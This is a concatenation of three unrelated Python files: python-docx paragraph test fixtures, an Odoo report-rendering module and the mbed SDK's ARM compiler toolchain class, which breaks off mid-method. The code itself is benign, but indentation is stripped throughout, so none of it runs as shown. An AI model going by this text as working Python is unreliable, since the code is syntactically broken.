assert body.xml == expected_xml
# fixtures -------------------------------------------------------
@pytest.fixture(params=[
('w:p', None, None, 'w:p/w:r'),
('w:p', 'foobar', None, 'w:p/w:r/w:t"foobar"'),
('w:p', None, 'Strong', 'w:p/w:r'),
('w:p', 'foobar', 'Strong', 'w:p/w:r/w:t"foobar"'),
])
def add_run_fixture(self, request, run_style_prop_):
before_cxml, text, style, after_cxml = request.param
paragraph = Paragraph(element(before_cxml), None)
expected_xml = xml(after_cxml)
return paragraph, text, style, run_style_prop_, expected_xml
@pytest.fixture(params=[
('w:p/w:pPr/w:jc{w:val=center}', WD_ALIGN_PARAGRAPH.CENTER),
('w:p', None),
])
def alignment_get_fixture(self, request):
cxml, expected_alignment_value = request.param
paragraph = Paragraph(element(cxml), None)
return paragraph, expected_alignment_value
@pytest.fixture(params=[
('w:p', WD_ALIGN_PARAGRAPH.LEFT,
'w:p/w:pPr/w:jc{w:val=left}'),
('w:p/w:pPr/w:jc{w:val=left}', WD_ALIGN_PARAGRAPH.CENTER,
'w:p/w:pPr/w:jc{w:val=center}'),
('w:p/w:pPr/w:jc{w:val=left}', None,
'w:p/w:pPr'),
('w:p', None, 'w:p/w:pPr'),
])
def alignment_set_fixture(self, request):
initial_cxml, new_alignment_value, expected_cxml = request.param
paragraph = Paragraph(element(initial_cxml), None)
expected_xml = xml(expected_cxml)
return paragraph, new_alignment_value, expected_xml
@pytest.fixture(params=[
('w:p', 'w:p'),
('w:p/w:pPr', 'w:p/w:pPr'),
('w:p/w:r/w:t"foobar"', 'w:p'),
('w:p/(w:pPr, w:r/w:t"foobar")', 'w:p/w:pPr'),
])
def clear_fixture(self, request):
initial_cxml, expected_cxml = request.param
paragraph = Paragraph(element(initial_cxml), None)
expected_xml = xml(expected_cxml)
return paragraph, expected_xml
@pytest.fixture(params=[
(None, None),
('Foo', None),
(None, 'Bar'),
('Foo', 'Bar'),
])
def insert_before_fixture(self, request, _insert_paragraph_before_, add_run_):
text, style = request.param
paragraph_ = _insert_paragraph_before_.return_value
add_run_calls = [] if text is None else [call(text)]
paragraph_.style = None
return text, style, paragraph_, add_run_calls
@pytest.fixture(params=[
('w:body/w:p{id=42}', 'w:body/(w:p,w:p{id=42})')
])
def _insert_before_fixture(self, request):
body_cxml, expected_cxml = request.param
body = element(body_cxml)
paragraph = Paragraph(body[0], None)
expected_xml = xml(expected_cxml)
return paragraph, body, expected_xml
@pytest.fixture
def parfmt_fixture(self, ParagraphFormat_, paragraph_format_):
paragraph = Paragraph(element('w:p'), None)
return paragraph, ParagraphFormat_, paragraph_format_
@pytest.fixture
def runs_fixture(self, p_, Run_, r_, r_2_, runs_):
paragraph = Paragraph(p_, None)
run_, run_2_ = runs_
return paragraph, Run_, r_, r_2_, run_, run_2_
@pytest.fixture
def style_get_fixture(self, part_prop_):
style_id = 'Foobar'
p_cxml = 'w:p/w:pPr/w:pStyle{w:val=%s}' % style_id
paragraph = Paragraph(element(p_cxml), None)
style_ = part_prop_.return_value.get_style.return_value
return paragraph, style_id, style_
@pytest.fixture(params=[
('w:p', 'Heading 1', 'Heading1',
'w:p/w:pPr/w:pStyle{w:val=Heading1}'),
('w:p/w:pPr', 'Heading 1', 'Heading1',
'w:p/w:pPr/w:pStyle{w:val=Heading1}'),
('w:p/w:pPr/w:pStyle{w:val=Heading1}', 'Heading 2', 'Heading2',
'w:p/w:pPr/w:pStyle{w:val=Heading2}'),
('w:p/w:pPr/w:pStyle{w:val=Heading1}', 'Normal', None,
'w:p/w:pPr'),
('w:p', None, None,
'w:p/w:pPr'),
])
def style_set_fixture(self, request, part_prop_):
p_cxml, value, style_id, expected_cxml = request.param
paragraph = Paragraph(element(p_cxml), None)
part_prop_.return_value.get_style_id.return_value = style_id
expected_xml = xml(expected_cxml)
return paragraph, value, expected_xml
@pytest.fixture(params=[
('w:p', ''),
('w:p/w:r', ''),
('w:p/w:r/w:t', ''),
('w:p/w:r/w:t"foo"', 'foo'),
('w:p/w:r/(w:t"foo", w:t"bar")', 'foobar'),
('w:p/w:r/(w:t"fo ", w:t"bar")', 'fo bar'),
('w:p/w:r/(w:t"foo", w:tab, w:t"bar")', 'foo\tbar'),
('w:p/w:r/(w:t"foo", w:br, w:t"bar")', 'foo\nbar'),
('w:p/w:r/(w:t"foo", w:cr, w:t"bar")', 'foo\nbar'),
])
def text_get_fixture(self, request):
p_cxml, expected_text_value = request.param
paragraph = Paragraph(element(p_cxml), None)
return paragraph, expected_text_value
@pytest.fixture
def text_set_fixture(self):
paragraph = Paragraph(element('w:p'), None)
paragraph.add_run('must not appear in result')
new_text_value = 'foo\tbar\rbaz\n'
expected_text_value = 'foo\tbar\nbaz\n'
return paragraph, new_text_value, expected_text_value
# fixture components ---------------------------------------------
@pytest.fixture
def add_run_(self, request):
return method_mock(request, Paragraph, 'add_run')
@pytest.fixture
def document_part_(self, request):
return instance_mock(request, DocumentPart)
@pytest.fixture
def _insert_paragraph_before_(self, request):
return method_mock(request, Paragraph, '_insert_paragraph_before')
@pytest.fixture
def p_(self, request, r_, r_2_):
return instance_mock(request, CT_P, r_lst=(r_, r_2_))
@pytest.fixture
def ParagraphFormat_(self, request, paragraph_format_):
return class_mock(
request, 'docx.text.paragraph.ParagraphFormat',
return_value=paragraph_format_
)
@pytest.fixture
def paragraph_format_(self, request):
return instance_mock(request, ParagraphFormat)
@pytest.fixture
def part_prop_(self, request, document_part_):
return property_mock(
request, Paragraph, 'part', return_value=document_part_
)
@pytest.fixture
def Run_(self, request, runs_):
run_, run_2_ = runs_
return class_mock(
request, 'docx.text.paragraph.Run', side_effect=[run_, run_2_]
)
@pytest.fixture
def r_(self, request):
return instance_mock(request, CT_R)
@pytest.fixture
def r_2_(self, request):
return instance_mock(request, CT_R)
@pytest.fixture
def run_style_prop_(self, request):
return property_mock(request, Run, 'style')
@pytest.fixture
def runs_(self, request):
run_ = instance_mock(request, Run, name='run_')
run_2_ = instance_mock(request, Run, name='run_2_')
return run_, run_2_
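# --- Illustrative sketch (editor's addition, not part of the original test file) ---
# The behaviour exercised above through cxml fixtures corresponds to this public
# python-docx usage (document contents are arbitrary):
def _paragraph_api_sketch():
    from docx import Document
    from docx.enum.text import WD_ALIGN_PARAGRAPH
    document = Document()
    paragraph = document.add_paragraph('foo')
    paragraph.add_run('\tbar')
    paragraph.alignment = WD_ALIGN_PARAGRAPH.CENTER
    paragraph.style = 'Heading 1'
    return paragraph.text  # 'foo\tbar'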
|
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import os
import re
from lxml import etree
import openerp
import openerp.tools as tools
import openerp.modules
import print_xml
import render
import urllib
from openerp import SUPERUSER_ID
from openerp.report.render.rml2pdf import customfonts
#
# coerce any type to a unicode string (to preserve non-ascii characters)
# and escape XML entities
#
def toxml(value):
unicode_value = tools.ustr(value)
return unicode_value.replace('&', '&amp;').replace('<', '&lt;').replace('>', '&gt;')
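# --- Illustrative note (editor's addition) --- toxml() coerces any value to
# unicode and escapes the three XML-special characters, matching the standard
# library behaviour, e.g.:
#
#     >>> from xml.sax.saxutils import escape
#     >>> escape('R&D <dept>')
#     'R&amp;D &lt;dept&gt;'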
class report_int(object):
_reports = {}
def __init__(self, name, register=True):
if register:
assert openerp.conf.deprecation.allow_report_int_registration
assert name.startswith('report.'), 'Report names should start with "report.".'
assert name not in self._reports, 'The report "%s" already exists.' % name
self._reports[name] = self
else:
# The report is instantiated at each use site, which is ok.
pass
self.__name = name
self.name = name
self.id = 0
self.name2 = '.'.join(name.split('.')[1:])
# TODO the reports have methods with a 'title' kwarg that is redundant with this attribute
self.title = None
def create(self, cr, uid, ids, datas, context=None):
return False
class report_rml(report_int):
"""
Automatically builds a document using the transformation process:
XML -> DATAS -> RML -> PDF -> HTML
using an XSL:RML transformation
"""
def __init__(self, name, table, tmpl, xsl, register=True):
super(report_rml, self).__init__(name, register=register)
self.table = table
self.internal_header=False
self.tmpl = tmpl
self.xsl = xsl
self.bin_datas = {}
self.generators = {
'pdf': self.create_pdf,
'html': self.create_html,
'raw': self.create_raw,
'sxw': self.create_sxw,
'txt': self.create_txt,
'odt': self.create_odt,
'html2html' : self.create_html2html,
'makohtml2html' :self.create_makohtml2html,
}
def create(self, cr, uid, ids, datas, context):
registry = openerp.registry(cr.dbname)
xml = self.create_xml(cr, uid, ids, datas, context)
xml = tools.ustr(xml).encode('utf8')
report_type = datas.get('report_type', 'pdf')
if report_type == 'raw':
return xml, report_type
registry['res.font'].font_scan(cr, SUPERUSER_ID, lazy=True, context=context)
rml = self.create_rml(cr, xml, uid, context)
ir_actions_report_xml_obj = registry['ir.actions.report.xml']
report_xml_ids = ir_actions_report_xml_obj.search(cr, uid, [('report_name', '=', self.name[7:])], context=context)
self.title = report_xml_ids and ir_actions_report_xml_obj.browse(cr,uid,report_xml_ids)[0].name or 'OpenERP Report'
create_doc = self.generators[report_type]
pdf = create_doc(rml, title=self.title)
return pdf, report_type
def create_xml(self, cr, uid, ids, datas, context=None):
if not context:
context={}
doc = print_xml.document(cr, uid, datas, {})
self.bin_datas.update( doc.bin_datas or {})
doc.parse(self.tmpl, ids, self.table, context)
xml = doc.xml_get()
doc.close()
return self.post_process_xml_data(cr, uid, xml, context)
def post_process_xml_data(self, cr, uid, xml, context=None):
if not context:
context={}
# find the position of the 3rd tag
# (skip the <?xml ...?> and the "root" tag)
iter = re.finditer('<[^>]*>', xml)
i = iter.next()
i = iter.next()
pos_xml = i.end()
doc = print_xml.document(cr, uid, {}, {})
tmpl_path = openerp.modules.get_module_resource('base', 'report', 'corporate_defaults.xml')
doc.parse(tmpl_path, [uid], 'res.users', context)
corporate_header = doc.xml_get()
doc.close()
# find the position of the tag after the <?xml ...?> tag
iter = re.finditer('<[^>]*>', corporate_header)
i = iter.next()
pos_header = i.end()
return xml[:pos_xml] + corporate_header[pos_header:] + xml[pos_xml:]
#
# TODO: The translation doesn't work for "<tag t="1">textext<tag> tex</tag>text</tag>"
#
def create_rml(self, cr, xml, uid, context=None):
if self.tmpl=='' and not self.internal_header:
self.internal_header=True
if not context:
context={}
registry = openerp.registry(cr.dbname)
ir_translation_obj = registry['ir.translation']
# In some case we might not use xsl ...
if not self.xsl:
return xml
stylesheet_file = tools.file_open(self.xsl)
try:
stylesheet = etree.parse(stylesheet_file)
xsl_path, _ = os.path.split(self.xsl)
for import_child in stylesheet.findall('./import'):
if 'href' in import_child.attrib:
imp_file = import_child.get('href')
_, imp_file = tools.file_open(imp_file, subdir=xsl_path, pathinfo=True)
import_child.set('href', urllib.quote(str(imp_file)))
imp_file.close()
finally:
stylesheet_file.close()
#TODO: get all the translation in one query. That means we have to:
# * build a list of items to translate,
# * issue the query to translate them,
# * (re)build/update the stylesheet with the translated items
def translate(doc, lang):
translate_aux(doc, lang, False)
def translate_aux(doc, lang, t):
for node in doc:
t = t or node.get("t")
if t:
text = None
tail = None
if node.text:
text = node.text.strip().replace('\n',' ')
if node.tail:
tail = node.tail.strip().replace('\n',' ')
if text:
translation1 = ir_translation_obj._get_source(cr, uid, self.name2, 'xsl', lang, text)
if translation1:
node.text = node.text.replace(text, translation1)
if tail:
translation2 = ir_translation_obj._get_source(cr, uid, self.name2, 'xsl', lang, tail)
if translation2:
node.tail = node.tail.replace(tail, translation2)
translate_aux(node, lang, t)
if context.get('lang', False):
translate(stylesheet.iter(), context['lang'])
transform = etree.XSLT(stylesheet)
xml = etree.tostring(
transform(etree.fromstring(xml)))
return xml
def create_pdf(self, rml, localcontext = None, logo=None, title=None):
if not localcontext:
localcontext = {}
localcontext.update({'internal_header':self.internal_header})
if logo:
self.bin_datas['logo'] = logo
else:
if 'logo' in self.bin_datas:
del self.bin_datas['logo']
obj = render.rml(rml, localcontext, self.bin_datas, self._get_path(), title)
obj.render()
return obj.get()
def create_html(self, rml, localcontext = None, logo=None, title=None):
obj = render.rml2html(rml, localcontext, self.bin_datas)
obj.render()
return obj.get()
def create_txt(self, rml,localcontext, logo=None, title=None):
obj = render.rml2txt(rml, localcontext, self.bin_datas)
obj.render()
return obj.get().encode('utf-8')
def create_html2html(self, rml, localcontext = None, logo=None, title=None):
obj = render.html2html(rml, localcontext, self.bin_datas)
obj.render()
return obj.get()
def create_raw(self,rml, localcontext = None, logo=None, title=None):
obj = render.odt2odt(etree.XML(rml),localcontext)
obj.render()
return etree.tostring(obj.get())
def create_sxw(self,rml,localcontext = None):
obj = render.odt2odt(rml,localcontext)
obj.render()
return obj.get()
def create_odt(self,rml,localcontext = None):
obj = render.odt2odt(rml,localcontext)
obj.render()
return obj.get()
def create_makohtml2html(self,html,localcontext = None):
obj = render.makohtml2html(html,localcontext)
obj.render()
return obj.get()
def _get_path(self):
return [
self.tmpl.replace(os.path.sep, '/').rsplit('/', 1)[0],
'addons',
tools.config['root_path']
]
|
|
"""
mbed SDK
Copyright (c) 2011-2019 ARM Limited
SPDX-License-Identifier: Apache-2.0
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import print_function, absolute_import
from builtins import str # noqa: F401
import re
from copy import copy
from os.path import join, dirname, splitext, basename, exists, isfile, relpath, sep
from os import makedirs, write, remove
from tempfile import mkstemp
from shutil import rmtree
from distutils.version import LooseVersion
from tools.toolchains.mbed_toolchain import (
mbedToolchain, TOOLCHAIN_PATHS, should_replace_small_c_lib
)
from tools.utils import mkdir, NotSupportedException, run_cmd
from tools.resources import FileRef
ARMC5_MIGRATION_WARNING = (
"Warning: Arm Compiler 5 is no longer supported as of Mbed 6. "
"Please upgrade your environment to Arm Compiler 6 "
"which is free to use with Mbed OS. For more information, "
"please visit https://os.mbed.com/docs/mbed-os/latest/tools/index.html"
)
UARM_TOOLCHAIN_WARNING = (
"Warning: We noticed that you are using uARM Toolchain either via --toolchain command line or default_toolchain option. "
"We are deprecating the use of the uARM Toolchain. "
"For more information on how to use the ARM toolchain with small C libraries, "
"please visit https://os.mbed.com/docs/mbed-os/latest/reference/using-small-c-libraries.html"
)
class ARM(mbedToolchain):
LINKER_EXT = '.sct'
LIBRARY_EXT = '.ar'
STD_LIB_NAME = "%s.ar"
DIAGNOSTIC_PATTERN = re.compile(r'"(?P<file>[^"]+)", line (?P<line>\d+)( \(column (?P<column>\d+)\)|): (?P<severity>Warning|Error|Fatal error): (?P<message>.+)')
INDEX_PATTERN = re.compile(r'(?P<col>\s*)\^')
DEP_PATTERN = re.compile(r'\S+:\s(?P<file>.+)\n')
SHEBANG = "#! armcc -E"
SUPPORTED_CORES = [
"Cortex-M0", "Cortex-M0+", "Cortex-M3", "Cortex-M4", "Cortex-M4F",
"Cortex-M7", "Cortex-M7F", "Cortex-M7FD", "Cortex-A5", "Cortex-A9"
]
ARMCC_RANGE = (LooseVersion("5.06"), LooseVersion("5.07"))
ARMCC_PRODUCT_RE = re.compile(b"Product: (.*)")
ARMCC_VERSION_RE = re.compile(br"Component: ARM Compiler (\d+\.\d+)")
@staticmethod
def check_executable():
"""Returns True if the executable (armcc) location specified by the
user exists OR the executable can be found on the PATH.
Returns False otherwise."""
return mbedToolchain.generic_check_executable("ARM", 'armcc', 2, 'bin')
def __init__(self, target, notify=None, macros=None,
build_profile=None, build_dir=None, coverage_patterns=None):
mbedToolchain.__init__(
self, target, notify, macros, build_dir=build_dir,
build_profile=build_profile)
if target.core not in self.SUPPORTED_CORES:
raise NotSupportedException(
"this compiler does not support the core %s" % target.core)
toolchain = "arm"
if should_replace_small_c_lib(target, toolchain):
target.c_lib = "std"
self.check_c_lib_supported(target, toolchain)
if (
getattr(target, "default_toolchain", "ARM") == "uARM"
or getattr(target, "c_lib", "std") == "small"
):
if "-DMBED_RTOS_SINGLE_THREAD" not in self.flags['common']:
self.flags['common'].append("-DMBED_RTOS_SINGLE_THREAD")
if "-D__MICROLIB" not in self.flags['common']:
self.flags['common'].append("-D__MICROLIB")
if "--library_type=microlib" not in self.flags['ld']:
self.flags['ld'].append("--library_type=microlib")
if "--library_type=microlib" not in self.flags['common']:
self.flags['common'].append("--library_type=microlib")
self.check_and_add_minimal_printf(target)
cpu = {
"Cortex-M0+": "Cortex-M0plus",
"Cortex-M4F": "Cortex-M4.fp.sp",
"Cortex-M7F": "Cortex-M7.fp.sp",
"Cortex-M7FD": "Cortex-M7.fp.dp"}.get(target.core, target.core)
ARM_BIN = join(TOOLCHAIN_PATHS['ARM'], "bin")
main_cc = join(ARM_BIN, "armcc")
self.flags['common'] += ["--cpu=%s" % cpu]
self.asm = [main_cc] + self.flags['common'] + self.flags['asm']
self.cc = [main_cc] + self.flags['common'] + self.flags['c']
self.cppc = (
[main_cc] + self.flags['common'] +
self.flags['c'] + self.flags['cxx']
)
self.ld = [join(ARM_BIN, "armlink")] + self.flags['ld']
self.ar = join(ARM_BIN, "armar")
self.elf2bin = join(ARM_BIN, "fromelf")
self.SHEBANG += " --cpu=%s" % cpu
self.product_name = None
def version_check(self):
# The --ide=mbed option works around an instability when checking the
# version of the ARMC6 binary that comes with Mbed Studio.
# NOTE: the --ide=mbed argument is only for use with Mbed OS
stdout, _, retcode = run_cmd(
[self.cc[0], "--vsn", "--ide=mbed"],
redirect=True
)
msg = None
min_ver, max_ver = self.ARMCC_RANGE
output = stdout.encode("utf-8")
match = self.ARMCC_VERSION_RE.search(output)
if match:
found_version = LooseVersion(match.group(1).decode("utf-8"))
else:
found_version = None
if found_version and (found_version < min_ver
or found_version >= max_ver):
msg = ("Compiler version mismatch: Have {}; "
"expected version >= {} and < {}"
.format(found_version, min_ver, max_ver))
elif not match or len(match.groups()) != 1:
msg = ("Compiler version mismatch: Could not detect version; "
"expected version >= {} and < {}"
.format(min_ver, max_ver))
if msg:
self.notify.cc_info({
"message": msg,
"file": "",
"line": "",
"col": "",
"severity": "WARNING",
})
msg = None
match = self.ARMCC_PRODUCT_RE.search(output)
if match:
self.product_name = match.group(1).decode("utf-8")
else:
self.product_name = None
if not match or len(match.groups()) != 1:
msg = (
"Could not detect product name: defaulting to professional "
"version of ARMC6"
)
def _get_toolchain_labels(self):
if getattr(self.target, "default_toolchain", "ARM") == "uARM":
return ["ARM", "ARM_MICRO", "ARMC5"]
else:
return ["ARM", "ARM_STD", "ARMC5"]
def parse_dependencies(self, dep_path):
dependencies = []
for line in open(dep_path).readlines():
match = ARM.DEP_PATTERN.match(line)
if match is not None:
# we need to prepend the chroot path, because the compiler runs
# chrooted when the .d files are generated
dependencies.append(
(self.CHROOT if self.CHROOT else '') + match.group('file')
)
return dependencies
def parse_output(self, output):
msg = None
for line in output.splitlines():
match = self.DIAGNOSTIC_PATTERN.match(line)
if match is not None:
if msg is not None:
self.notify.cc_info(msg)
msg = None
msg = {
'severity': match.group('severity').lower(),
'file': match.group('file'),
'line': match.group('line'),
'message': match.group('message'),
'text': '',
'target_name': self.target.name,
'toolchain_name': self.name
}
if match.group('column'):
msg['col'] = match.group('column')
else:
msg['col'] = 0
elif msg is not None:
# Determine the warning/error column by calculating the '^'
# position
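# For example, the compiler typically echoes the offending source line
# followed by a caret marker line (this sample is illustrative, not
# captured output):
#     "main.c", line 12: Warning: ...
#         int x = y;
#               ^
# so len(match.group('col')) below yields the column of the '^' marker
# (the length of the leading whitespace).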
match = ARM.INDEX_PATTERN.match(line)
if match is not None:
msg['col'] = len(match.group('col'))
self.notify.cc_info(msg)
msg = None
else:
msg['text'] += line+"\n"
if msg is not None:
self.notify.cc_info(msg)
def get_dep_option(self, object):
base, _ = splitext(object)
dep_path = base + '.d'
return ["--depend", dep_path]
def get_config_option(self, config_header):
return ['--preinclude=' + config_header]
def get_compile_options(self, defines, includes, for_asm=False):
opts = ['-D%s' % d for d in defines]
config_header = self.get_config_header()
if config_header is not None:
opts = opts + self.get_config_option(config_header)
if for_asm:
return opts
if self.RESPONSE_FILES:
opts += ['--via', self.get_inc_file(includes)]
else:
opts += ["-I%s" % i for i in includes if i]
return opts
def assemble(self, source, object, includes):
# Preprocess first, then assemble
dir = join(dirname(object), '.temp')
mkdir(dir)
tempfile = join(dir, basename(object) + '.E.s')
# Build preprocess assemble command
cmd_pre = copy(self.asm)
cmd_pre.extend(self.get_compile_options(
self.get_symbols(True), includes, True))
cmd_pre.extend(["-E", "-o", tempfile, source])
# Build main assemble command
cmd = self.asm + ["-o", object, tempfile]
# Return command array, don't execute
return [cmd_pre, cmd]
def compile(self, cc, source, object, includes):
# Build compile command
cmd = cc + self.get_compile_options(self.get_symbols(), includes)
cmd.extend(self.get_dep_option(object))
cmd.extend(["-o", object, source])
return [cmd]
def compile_c(self, source, object, includes):
return self.compile(self.cc, source, object, includes)
def compile_cpp(self, source, object, includes):
return self.compile(self.cppc, source, object, includes)
def correct_scatter_shebang(self, sc_fileref, cur_dir_name=None):
"""Correct the shebang at the top of a scatter file.
The shebang line is the line at the top of the file starting with '#!'. If this line is present
then the linker will execute the command on that line on the content of the scatter file prior
to consuming the content into the link. Typically the shebang line will contain an instruction
to run the C-preprocessor (either 'armcc -E' or 'armclang -E') which allows for macro expansion,
inclusion of headers etc. Other options are passed to the preprocessor to specify aspects of the
system such as the processor architecture and cpu type.
The build system (at this point) will have constructed what it considers to be a correct shebang
line for this build. If this differs from the line in the scatter file then the scatter file
will be rewritten by this function to contain the build-system-generated shebang line. Note
that the rewritten file will be placed in the BUILD output directory.
Include processing
If the scatter file runs the preprocessor, and contains #include statements then the pre-processor
include path specifies where the #include files are to be found. Typically, #include files
are specified with a path relative to the location of the original scatter file. When the
preprocessor runs, the system automatically passes the location of the scatter file into the
include path through an implicit '-I' option to the preprocessor, and this works fine in the
offline build system.
Unfortunately this approach does not work in the online build, because the preprocessor
command runs in a chroot. The true (non-chroot) path to the file as known by the build system
looks something like this:
/tmp/chroots/ch-eefd72fb-2bcb-4e99-9043-573d016618bb/extras/mbed-os.lib/...
whereas the path known by the preprocessor will be:
/extras/mbed-os.lib/...
Consequently, the chroot path has to be explicitly passed to the preprocessor through an
explicit -I/path/to/chroot/file option in the shebang line.
*** THERE IS AN ASSUMPTION THAT THE CHROOT PATH IS THE REAL FILE PATH WITH THE FIRST
*** THREE ELEMENTS REMOVED. THIS ONLY HOLDS TRUE UNTIL THE ONLINE BUILD SYSTEM CHANGES
If the include path manipulation as described above does change, then any scatter file
containing a #include statement is likely to fail on the online compiler.
Positional arguments:
sc_fileref -- FileRef object of the scatter file
Keyword arguments:
cur_dir_name -- the name (not path) of the directory containing the
scatter file
Return:
The FileRef of the correct scatter file
Side Effects:
This method MAY write a new scatter file to disk
"""
with open(sc_fileref.path, "r") as input:
lines = input.readlines()
# If the existing scatter file has no shebang line, or the line that it does have
# matches the desired line then the existing scatter file is used directly without rewriting.
if (lines[0].startswith(self.SHEBANG) or
not lines[0].startswith("#!")):
return sc_fileref
new_scatter = join(self.build_dir, ".link_script.sct")
if cur_dir_name is None:
cur_dir_name = dirname(sc_fileref.path)
# For a chrooted system, adjust the path to the scatter file to be a valid
# chroot location by removing the first three elements of the path.
if cur_dir_name.startswith("/tmp/chroots"):
cur_dir_name = sep + join(*(cur_dir_name.split(sep)[4:]))
# Add the relocated scatter file path to the include path.
self.SHEBANG += " -I%s" % cur_dir_name
# Only rewrite if doing a full build...
if self.need_update(new_scatter, [sc_fileref.path]):
with open(new_scatter, "w") as out:
# Write the new shebang line...
out.write(self.SHEBANG + "\n")
# ...followed by the unmolested remaining content from the original scatter file.
out.write("".join(lines[1:]))
return FileRef(".link_script.sct", new_scatter)
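# Illustrative sketch (not part of the original method): the chroot
# adjustment above simply drops the first three path elements, e.g.
#
#   p = "/tmp/chroots/ch-eefd72fb/extras/mbed-os.lib/device/scatter.sct"
#   sep + join(*(p.split(sep)[4:]))  ->  "/extras/mbed-os.lib/device/scatter.sct"
#
# (assuming a POSIX separator; the chroot id above is made up).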
def get_link_command(
self,
output,
objects,
libraries,
lib_dirs,
scatter_file
):
base, _ = splitext(output)
map_file = base + ".map"
args = ["-o", output, "--info=totals", "--map", "--list=%s" % map_file]
args.extend(objects)
args.extend(libraries)
if lib_dirs:
args.extend(["--userlibpath", ",".join(lib_dirs)])
if scatter_file:
scatter_name = relpath(scatter_file)
new_scatter = self.correct_scatter_shebang(FileRef(scatter_name, scatter_file))
args.extend(["--scatter", new_scatter.path])
cmd = self.ld + args
if self.RESPONSE_FILES:
cmd_linker = cmd[0]
link_files = self.get_link_file(cmd[1:])
cmd = [cmd_linker, '--via', link_files]
return cmd
def link(self, output, objects, libraries, lib_dirs, scatter_file):
cmd = self.get_link_command(
output, objects, libraries, lib_dirs, scatter_file
)
self.notify.cc_verbose("Link: %s" % ' '.join(cmd))
self.default_cmd(cmd)
def archive(self, objects, lib_path):
if self.RESPONSE_FILES:
param = ['--via', self.get_arch_file(objects)]
else:
param = objects
self.default_cmd([self.ar, '-r', lib_path] + param)
def get_binary_commands(self, bin_arg, bin, elf):
return [self.elf2bin, bin_arg, '-o', bin, elf]
def binary(self, resources, elf, bin):
_, fmt = splitext(bin)
# On .hex format, combine multiple .hex files (for multiple load
# regions) into one
bin_arg = {".bin": "--bin", ".hex": "--i32combined"}[fmt]
cmd = self.get_binary_commands(bin_arg, bin, elf)
# remove target binary file/path
if exists(bin):
if isfile(bin):
remove(bin)
else:
rmtree(bin)
self.notify.cc_verbose("FromELF: %s" % ' '.join(cmd))
self.default_cmd(cmd)
@staticmethod
def name_mangle(name):
return "_Z%i%sv" % (len(name), name)
@staticmethod
def make_ld_define(name, value):
return "--predefine=\"-D%s=%s\"" % (name, value)
@staticmethod
def redirect_symbol(source, sync, build_dir):
if not exists(build_dir):
makedirs(build_dir)
handle, filename = mkstemp(prefix=".redirect-symbol.", dir=build_dir)
write(handle, "RESOLVE %s AS %s\n" % (source, sync))
return "--edit=%s" % filename
class ARM_STD(ARM):
OFFICIALLY_SUPPORTED = True
def __init__(
self,
target,
notify=None,
macros=None,
build_profile=None,
build_dir=None,
coverage_patterns=None
):
ARM.__init__(
self,
target,
notify,
macros,
build_dir=build_dir,
build_profile=build_profile,
coverage_patterns=None
)
if int(target.build_tools_metadata["version"]) > 0:
# check only for ARMC5 because ARM_STD means using ARMC5, and thus
# supported_toolchains must include ARMC5
if not set(target.supported_toolchains).intersection(
set(("ARMC5", "ARM"))
):
raise NotSupportedException(
"ARM compiler 5 support is required for ARM build"
)
else:
if not set(("ARM", "uARM")).intersection(set(
target.supported_toolchains
)):
raise NotSupportedException(
"ARM/uARM compiler support is required for ARM build"
)
class ARM_MICRO(ARM):
PATCHED_LIBRARY = False
OFFICIALLY_SUPPORTED = True
def __init__(
self,
target,
notify=None,
macros=None,
silent=False,
extra_verbose=False,
build_profile=None,
build_dir=None,
coverage_patterns=None,
):
target.default_toolchain = "uARM"
if int(target.build_tools_metadata["version"]) > 0:
# At this point we already know that we want to use ARMC5+Microlib,
# so check that they are supported. For AC6+Microlib we still use the
# ARMC6 class.
if not set(("ARMC5", "uARM")).issubset(set(
target.supported_toolchains
)):
raise NotSupportedException(
"ARM/uARM compiler support is required for ARM build"
)
else:
if not set(("ARM", "uARM")).intersection(set(
target.supported_toolchains
)):
raise NotSupportedException(
"ARM/uARM compiler support is required for ARM build"
)
ARM.__init__(
self,
target,
notify,
macros,
build_dir=build_dir,
build_profile=build_profile
)
class ARMC6(ARM_STD):
OFFICIALLY_SUPPORTED = False
SHEBANG = "#! armclang -E --target=arm-arm-none-eabi -x c"
SUPPORTED_CORES = [
"Cortex-M0", "Cortex-M0+", "Cortex-M3", "Cortex-M4",
"Cortex-M4F", "Cortex-M7", "Cortex-M7F", "Cortex-M7FD",
"Cortex-M23", "Cortex-M23-NS", "Cortex-M33", "Cortex-M33F",
"Cortex-M33-NS", "Cortex-M33F-NS", "Cortex-M33FE-NS", "Cortex-M33FE",
"Cortex-A5", "Cortex-A9"
]
ARMCC_RANGE = (LooseVersion("6.10"), LooseVersion("7.0"))
LD_DIAGNOSTIC_PATTERN = re.compile(
'(?P<severity>Warning|Error): (?P<message>.+)'
)
DIAGNOSTIC_PATTERN = re.compile(r'((?P<file>[^:]+):(?P<line>\d+):)(?P<col>\d+):? (?P<severity>warning|[eE]rror|fatal error): (?P<message>.+)')
@staticmethod
def check_executable():
return mbedToolchain.generic_check_executable("ARMC6", "armclang", 1)
def __init__(self, target, *args, **kwargs):
mbedToolchain.__init__(self, target, *args, **kwargs)
if target.core not in self.SUPPORTED_CORES:
raise NotSupportedException(
"this compiler does not support the core %s" % target.core)
if int(target.build_tools_metadata["version"]) > 0:
if not set(("ARM", "ARMC6", "uARM")).intersection(set(
target.supported_toolchains
)):
raise NotSupportedException(
"ARM/ARMC6 compiler support is required for ARMC6 build"
)
else:
if not set(("ARM", "ARMC6")).intersection(set(
target.supported_toolchains
)):
raise NotSupportedException(
"ARM/ARMC6 compiler support is required for ARMC6 build"
)
toolchain = "arm"
if should_replace_small_c_lib(target, toolchain):
target.c_lib = "std"
self.check_c_lib_supported(target, toolchain)
if (
getattr(target, "default_toolchain", "ARMC6") == "uARM"
or getattr(target, "c_lib", "std") == "small"
):
if "-DMBED_RTOS_SINGLE_THREAD" not in self.flags['common']:
self.flags['common'].append("-DMBED_RTOS_SINGLE_THREAD")
if "-D__MICROLIB" not in self.flags['common']:
self.flags['common'].append("-D__MICROLIB")
if "--library_type=microlib" not in self.flags['ld']:
self.flags['ld'].append("--library_type=microlib")
if "--library_type=microlib" not in self.flags['asm']:
self.flags['asm'].append("--library_type=microlib")
self.check_and_add_minimal_printf(target)
if target.is_TrustZone_non_secure_target:
# Add linking time preprocessor macro DOMAIN_NS
